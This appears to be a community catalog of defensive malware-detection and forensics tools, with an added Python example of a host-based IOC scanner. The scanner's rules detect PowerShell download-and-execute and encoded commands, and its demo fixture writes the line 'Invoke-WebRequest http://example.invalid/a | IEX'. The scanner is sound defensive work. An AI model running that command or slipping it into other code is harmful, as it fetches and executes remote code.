An open-source unified XDR and SIEM platform for threat prevention, detection, and response across endpoints and cloud workloads.
A comprehensive collection of Yara rules for malware detection, vulnerability identification, and security analysis.
A curated list of awesome YARA rules, tools, and resources for malware researchers and security professionals.
A simple IOC and YARA scanner for detecting malware and security threats via file names, hashes, YARA rules, and C2 connections.
Identifies compilers, packers, obfuscators, and other characteristics in Android APK and DEX files.
A PowerShell module for Blue Teams, Incident Responders, and System Administrators to hunt persistence techniques implanted in Windows machines.
A suite of network fingerprinting standards for TLS, TCP, HTTP, SSH, and other protocols to facilitate threat detection and security analysis.
A forensic evidence collection and analysis toolkit for macOS, gathering system data to detect and investigate malware infections.
An obfuscation-neglect Android malware scoring system that analyzes APKs for malicious behavior patterns.
A tool for static vulnerability analysis and runtime monitoring of Docker images and containers to detect malware and anomalous activities.
An open dataset and toolkit for training static PE malware machine learning models, featuring millions of labeled Windows executable samples.
An open dataset and toolkit for training static PE malware machine learning models, featuring extracted features from millions of Windows executable files.
A CLI tool for real-time malicious package detection and software supply chain security across multiple ecosystems.
Scans files and process memory for Cobalt Strike beacons and extracts their configuration.
A lightweight Bash script for scanning Linux/Unix/OSX systems for Indicators of Compromise (IOCs) without installation.
Enumerates persistently installed software on macOS, similar to AutoRuns for Windows.
Route-level file upload security for Node.js, scanning uploaded files for malware, file-type spoofing (declared type not matching content), and risky archives before they are written to storage.
A portable utility that identifies linkers, compilers, and packers used to create executable files across Windows, Linux, and macOS.
A static code analyzer that detects and reports potential malicious behaviors in Android applications.
A collection of publicly shared Indicators of Compromise (IOCs) from FireEye for threat intelligence and security research.
A dynamic API calls tracer for Windows and Linux applications, built on DynamoRIO for transparent malware analysis.
A framework for automated extraction of static and dynamic features from Android APKs for malware detection.
A PowerShell module for live incident response that enumerates Windows autorun artifacts to detect persistence mechanisms used by malware and legitimate programs.
A curated list of tools and resources for understanding, detecting, and removing malware persistence techniques across operating systems.
A Python library for creating adversarial attacks against Windows malware detectors to evaluate their robustness.
A GitHub Action to upload and scan files for malware using VirusTotal's analysis engine.
A Python tool for automating Android device security hardening, malware detection, and privacy protection via ADB.
A Python tool for advanced analysis of Windows AppCompat/AmCache forensic artifacts, enabling threat hunting beyond basic grep techniques.
A curated collection of information and tools for detecting, analyzing, and hunting malware persistence mechanisms across operating systems.
A simple, self-contained modular host-based IOC scanner built around the YARA pattern matching engine.
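Several of the entries above (the IOC/YARA scanner, the Bash IOC script, and this YARA-based host scanner) do the same basic job: walk a filesystem and flag files by name, by hash, and by content pattern. The following is an added illustration of that loop, written for this catalog page; it is not the code of any listed project. The IOC filenames, hashes and byte patterns are constructed stand-ins (the patterns are plain regexes playing the role of YARA rules), and the `demo()` helper builds a throwaway directory so it runs offline.

```python
"""Minimal host-based IOC scanner: flags files by name, SHA-256 hash and
byte-pattern rules. Added example for the catalog; not a listed project's code."""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass, field

# Constructed IOC set (hypothetical values, not real threat intelligence).
IOC_FILENAMES = {"svch0st.exe", "update_helper.vbs"}
IOC_SHA256 = {hashlib.sha256(b"MZ\x90\x00evil-sample").hexdigest()}

# Byte-pattern rules standing in for YARA rules; keyed by rule name.
IOC_PATTERNS = {
    "suspicious_powershell_download": re.compile(
        rb"Invoke-WebRequest\s+[^\n]*\|\s*IEX", re.I),
    "base64_encoded_command": re.compile(
        rb"-EncodedCommand\s+[A-Za-z0-9+/=]{40,}", re.I),
}


@dataclass
class Match:
    path: str
    reasons: list = field(default_factory=list)


def sha256_of(path, chunk=1 << 16):
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_file(path, max_pattern_bytes=4 << 20):
    """Return a Match listing every IOC the file triggers, or None if clean.
    Pattern rules only look at the first max_pattern_bytes to bound cost."""
    reasons = []
    name = os.path.basename(path)
    if name.lower() in IOC_FILENAMES:
        reasons.append(f"filename:{name}")
    digest = sha256_of(path)
    if digest in IOC_SHA256:
        reasons.append(f"sha256:{digest}")
    with open(path, "rb") as f:
        head = f.read(max_pattern_bytes)
    for rule, rx in IOC_PATTERNS.items():
        if rx.search(head):
            reasons.append(f"rule:{rule}")
    return Match(path, reasons) if reasons else None


def scan_tree(root):
    """Walk root recursively; unreadable files are skipped, not fatal."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            try:
                m = scan_file(p)
            except OSError:
                continue
            if m:
                hits.append(m)
    return hits


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)


def demo():
    """Build a constructed tree, scan it, return {basename: reasons}."""
    with tempfile.TemporaryDirectory() as d:
        _write(d, "svch0st.exe", b"MZ\x90\x00evil-sample")          # name + hash hit
        _write(d, "sub/deploy.ps1",
               b"Invoke-WebRequest http://example.invalid/a | IEX\n")  # rule hit
        _write(d, "readme.txt", b"nothing to see here\n")            # clean
        return {os.path.basename(m.path): m.reasons for m in scan_tree(d)}


if __name__ == "__main__":
    for name, why in demo().items():
        print(name, "->", ", ".join(why))
```

Hash and filename checks are cheap and exact; the pattern rules are where real scanners spend their time, which is why the example caps the bytes it pattern-matches per file and why a production tool would use the YARA engine rather than ad hoc regexes.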
A browser emulation tool that detects exploits targeting browser and browser plugin vulnerabilities by analyzing various file types.
A tool to verify scripts and executables by hash to prevent supply chain attacks.
A Python tool that extracts HTTP streams from PCAP files and scans them with YARA rules for security analysis.
A honeypot that emulates USB storage devices to detect and capture malware that spreads via USB propagation.
A Python script that monitors and alerts on indicators of compromise (IOCs) using Google Custom Search Engines and Safe Browsing APIs.
Open-Awesome is built by the community, for the community. Submit a project, suggest an awesome list, or help improve the catalog on GitHub.